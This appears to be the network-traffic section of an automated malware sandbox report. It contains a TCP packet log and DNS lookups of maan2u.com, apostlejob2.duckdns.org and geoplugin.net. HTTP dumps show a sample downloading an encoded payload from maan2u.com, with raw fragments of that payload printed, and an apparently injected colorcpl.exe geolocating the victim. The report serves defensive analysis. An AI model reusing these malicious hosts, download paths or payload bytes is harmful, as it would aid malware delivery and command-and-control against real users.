Sep 25, 2024 09:34:35.537086964 CEST | 49705 | 443 | 192.168.2.5 | 112.137.173.77
Sep 25, 2024 09:34:35.579395056 CEST | 443 | 49705 | 112.137.173.77 | 192.168.2.5
Sep 25, 2024 09:34:36.089123964 CEST | 443 | 49705 | 112.137.173.77 | 192.168.2.5
Sep 25, 2024 09:34:36.143326044 CEST | 49705 | 443 | 192.168.2.5 | 112.137.173.77
Sep 25, 2024 09:34:36.319142103 CEST | 443 | 49705 | 112.137.173.77 | 192.168.2.5
Sep 25, 2024 09:34:36.319161892 CEST | 443 | 49705 | 112.137.173.77 | 192.168.2.5
Sep 25, 2024 09:34:36.319194078 CEST | 443 | 49705 | 112.137.173.77 | 192.168.2.5
Sep 25, 2024 09:34:36.319207907 CEST | 443 | 49705 | 112.137.173.77 | 192.168.2.5
Sep 25, 2024 09:34:36.319221020 CEST | 443 | 49705 | 112.137.173.77 | 192.168.2.5
Sep 25, 2024 09:34:36.319339991 CEST | 49705 | 443 | 192.168.2.5 | 112.137.173.77
Sep 25, 2024 09:34:36.319339991 CEST | 49705 | 443 | 192.168.2.5 | 112.137.173.77
Sep 25, 2024 09:34:36.319359064 CEST | 443 | 49705 | 112.137.173.77 | 192.168.2.5
Sep 25, 2024 09:34:36.319403887 CEST | 49705 | 443 | 192.168.2.5 | 112.137.173.77
Sep 25, 2024 09:34:36.321079969 CEST | 443 | 49705 | 112.137.173.77 | 192.168.2.5
Sep 25, 2024 09:34:36.321088076 CEST | 443 | 49705 | 112.137.173.77 | 192.168.2.5
Sep 25, 2024 09:34:36.321106911 CEST | 443 | 49705 | 112.137.173.77 | 192.168.2.5
                                                        Sep 25, 2024 09:34:36.321165085 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.321171045 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.321193933 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.321213007 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.567298889 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.567312956 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.567343950 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.567370892 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.567378998 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.567413092 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.567429066 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.568690062 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.568706989 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.568747044 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.568752050 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.568788052 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.570485115 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.570502043 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.570568085 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.570571899 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.570604086 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.571451902 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.571469069 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.571518898 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.571522951 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.571557999 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.790852070 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.790863037 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.790893078 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.791074038 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.791074038 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.791086912 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.791124105 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.791615009 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.791631937 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.791692972 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.791697979 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.791747093 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.792500973 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.792516947 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.792586088 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.792589903 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.792623043 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.793390989 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.793406963 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.793461084 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.793464899 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.793499947 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.877732992 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.877754927 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.877830029 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.877840042 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.877887011 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.878716946 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.878732920 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.878783941 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.878787994 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.878813028 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.878830910 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.879331112 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.879348993 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.879416943 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:36.879420996 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:36.879462004 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.021473885 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.021498919 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.021584034 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.021595955 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.021639109 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.022049904 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.022066116 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.022114038 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.022118092 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.022154093 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.022756100 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.022773027 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.022936106 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.022939920 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.022985935 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.023612022 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.023633003 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.023699999 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.023704052 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.023741007 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.023838997 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.023861885 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.023893118 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.023895979 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.023931980 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.024776936 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.024795055 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.024849892 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.024853945 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.024890900 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.025638103 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.025655031 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.025702000 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.025706053 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.025743961 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.026571035 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.026587009 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.026629925 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.026633978 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.026673079 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.111588001 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.111613035 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.111677885 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.111677885 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.111690044 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.111711025 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.111721992 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.111763954 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.111766100 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.111778021 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.111800909 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.111829996 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.111835957 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.111844063 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.111850023 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.111864090 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.111869097 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.111874104 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.111902952 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.111953020 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.135545015 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.135566950 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.135602951 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.135628939 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.135636091 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.135641098 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.135685921 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.250833035 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.250863075 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.250969887 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.250977993 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.251033068 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.251138926 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.251157999 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.251199007 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.251203060 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.251224041 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.251238108 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.251791954 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.251811981 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.251872063 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.251876116 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.251913071 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.252166033 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.252182961 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.252228975 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.252233028 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.252271891 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.252549887 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.252564907 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.252615929 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.252624035 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.252661943 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.252891064 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.252907038 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.252958059 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.252962112 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.252999067 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.253418922 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.253434896 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.253480911 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.253484964 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.253520012 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.253967047 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.253985882 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.254045010 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.254049063 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.254085064 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.338021994 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.338088036 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.338180065 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.338191986 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.338212013 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.338211060 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.338227987 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.338246107 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.338258028 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.338298082 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.338298082 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.338320017 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.338349104 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.338372946 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.338485003 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.338535070 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.338557005 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.338562012 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.338583946 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.338598013 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.338669062 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.338711023 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.338721991 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.338735104 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.338762045 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.338774920 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.339179039 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.339219093 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.339241028 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.339246035 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.339277983 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.339313030 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.339410067 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.339459896 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.339478016 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.339483023 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.339504004 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.339519978 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.339618921 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.339662075 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.339678049 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.339683056 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.339709997 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.340126991 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.340182066 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.340209007 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.340213060 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.340241909 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.340241909 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.340254068 CEST49705443192.168.2.5112.137.173.77
Timestamp                             Source Port  Dest Port  Source IP    Dest IP
Sep 25, 2024 09:34:34.188999891 CEST  61186        53         192.168.2.5  1.1.1.1
Sep 25, 2024 09:34:34.535358906 CEST  53           61186      1.1.1.1      192.168.2.5
Sep 25, 2024 09:34:41.457039118 CEST  51823        53         192.168.2.5  1.1.1.1
Sep 25, 2024 09:34:42.069914103 CEST  53           51823      1.1.1.1      192.168.2.5
Sep 25, 2024 09:34:43.305740118 CEST  58738        53         192.168.2.5  1.1.1.1
Sep 25, 2024 09:34:43.313144922 CEST  53           58738      1.1.1.1      192.168.2.5
Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                     Type            Class        DNS over HTTPS
Sep 25, 2024 09:34:34.188999891 CEST  192.168.2.5  1.1.1.1  0x6415    Standard query (0)  maan2u.com               A (IP address)  IN (0x0001)  false
Sep 25, 2024 09:34:41.457039118 CEST  192.168.2.5  1.1.1.1  0x1f88    Standard query (0)  apostlejob2.duckdns.org  A (IP address)  IN (0x0001)  false
Sep 25, 2024 09:34:43.305740118 CEST  192.168.2.5  1.1.1.1  0xe6b0    Standard query (0)  geoplugin.net            A (IP address)  IN (0x0001)  false
Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                     CName  Address         Type            Class        DNS over HTTPS
Sep 25, 2024 09:34:34.535358906 CEST  1.1.1.1    192.168.2.5  0x6415    No error (0)  maan2u.com               -      112.137.173.77  A (IP address)  IN (0x0001)  false
Sep 25, 2024 09:34:42.069914103 CEST  1.1.1.1    192.168.2.5  0x1f88    No error (0)  apostlejob2.duckdns.org  -      192.161.184.44  A (IP address)  IN (0x0001)  false
Sep 25, 2024 09:34:43.313144922 CEST  1.1.1.1    192.168.2.5  0xe6b0    No error (0)  geoplugin.net            -      178.237.33.50   A (IP address)  IN (0x0001)  false
                                                        • maan2u.com
                                                        • geoplugin.net
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49707        178.237.33.50   80                2684  C:\Windows\SysWOW64\colorcpl.exe
Timestamp                             Bytes transferred  Direction  Data
Sep 25, 2024 09:34:43.321554899 CEST  71                 OUT
    GET /json.gp HTTP/1.1
    Host: geoplugin.net
    Cache-Control: no-cache
Sep 25, 2024 09:34:43.932843924 CEST  1170               IN
    HTTP/1.1 200 OK
    date: Wed, 25 Sep 2024 07:34:43 GMT
    server: Apache
    content-length: 962
    content-type: application/json; charset=utf-8
    cache-control: public, max-age=300
    access-control-allow-origin: *
    Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49705        112.137.173.77  443               2780  C:\Users\user\Desktop\XjPA2pnUhC.exe
Timestamp                Bytes transferred  Direction  Data
2024-09-25 07:34:35 UTC  163                OUT
    GET /doc/233_Qzzgbhhaaml HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: maan2u.com
2024-09-25 07:34:36 UTC  365                IN
    HTTP/1.1 200 OK
    Connection: close
    last-modified: Tue, 24 Sep 2024 23:56:18 GMT
    accept-ranges: bytes
    content-length: 1117948
    date: Wed, 25 Sep 2024 07:34:35 GMT
    server: LiteSpeed
    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                        Data Ascii: 1NHT1NK/1NrXwdbYzdDZz9LCv7/J2r7bzMu/2dXB2s3V1dTVy9jQ0sC8w9LL28bS0MnZycu81dTKytG9y8nV2M290MHUzdm+yc3b1NHM29K/29XXwdnXzdHW0NKmwMC4LrnUM4Hq1jGJ7NKhHNnay7LPzcLrvc2rN7nNojyfxvgxqNu1KanCy7ja1yCAy77UiNm+yc3U1NHM1NK/29rXwdnYzdDWz9LCwL/J2sHbzMvA2drBgNLaUJTaxNnO07+
                                                        2024-09-25 07:34:36 UTC16384INData Raw: 32 4d 33 43 7a 77 57 2f 30 75 2f 67 34 39 4b 75 52 61 6e 54 75 45 65 7a 31 4c 52 47 72 4e 59 4e 43 4c 6a 5a 71 42 66 41 76 2b 67 62 71 4c 37 31 54 4a 36 2f 36 2b 71 76 32 72 62 33 72 64 54 56 55 64 66 50 30 73 43 38 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 31 64 51 41 30 64 45 71 49 42 37 56 32 4b 61 39 30 4c 55 51 7a 74 6d 2b 36 63 33 62 31 4f 48 4d 32 39 4b 69 32 39 58 58 6f 64 6e 58 7a 66 66 57 30 4e 4b 37 77 4d 43 67 73 36 6a 55 7a 46 47 2f 32 64 58 42 31 63 33 56 31 64 76 56 79 39 6a 50 30 73 43 38 76 4d 33 4c 54 64 4c 4e 44 53 4d 62 78 73 75 38 32 74 73 66 55 72 54 43 34 2f 32 76 31 36 41 6d 71 62 37 73 57 4c 4c 42 34 78 32 77 32 2f 74 61 73 73 32 2f 32 39 72 59 71 4b 2b 78 30 74 41 41 30 4e 4c 43 77 4c 2f 4a 32 73 48 62 7a 4d 76 41 32 64 58
                                                        Data Ascii: 2M3CzwW/0u/g49KuRanTuEez1LRGrNYNCLjZqBfAv+gbqL71TJ6/6+qv2rb3rdTVUdfP0sC8vNLL28nS0MnWycu81dQA0dEqIB7V2Ka90LUQztm+6c3b1OHM29Ki29XXodnXzffW0NK7wMCgs6jUzFG/2dXB1c3V1dvVy9jP0sC8vM3LTdLNDSMbxsu82tsfUrTC4/2v16Amqb7sWLLB4x2w2/tass2/29rYqK+x0tAA0NLCwL/J2sHbzMvA2dX
                                                        2024-09-25 07:34:36 UTC16384INData Raw: 79 63 75 38 32 74 54 4b 79 73 36 39 79 38 6e 61 32 4d 32 39 7a 38 48 55 7a 64 61 2b 79 63 33 55 31 4e 48 4d 31 4e 4b 2f 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c 43 77 4c 2f 4a 32 73 48 62 7a 4d 76 41 32 64 58 42 31 63 33 56 31 64 76 56 79 39 6a 50 30 73 43 38 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 74 54 4b 79 73 36 39 79 38 6e 61 32 4d 32 39 7a 38 48 55 7a 64 61 2b 79 63 33 55 31 4e 48 4d 31 4e 4b 2f 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c 43 77 4c 2f 4a 32 73 48 62 7a 4d 76 41 32 64 58 42 31 63 33 56 31 64 76 56 79 39 6a 50 30 73 43 38 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 74 54 4b 79 73 36 39 79 38 6e 61 32 4d 32 39 7a 38 48 55 7a 64 61 2b 79 63 33 55 31 4e 48 4d 31 4e 4b 2f 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c
                                                        Data Ascii: ycu82tTKys69y8na2M29z8HUzda+yc3U1NHM1NK/29rXwdnYzdDWz9LCwL/J2sHbzMvA2dXB1c3V1dvVy9jP0sC8vNLL28nS0MnWycu82tTKys69y8na2M29z8HUzda+yc3U1NHM1NK/29rXwdnYzdDWz9LCwL/J2sHbzMvA2dXB1c3V1dvVy9jP0sC8vNLL28nS0MnWycu82tTKys69y8na2M29z8HUzda+yc3U1NHM1NK/29rXwdnYzdDWz9L
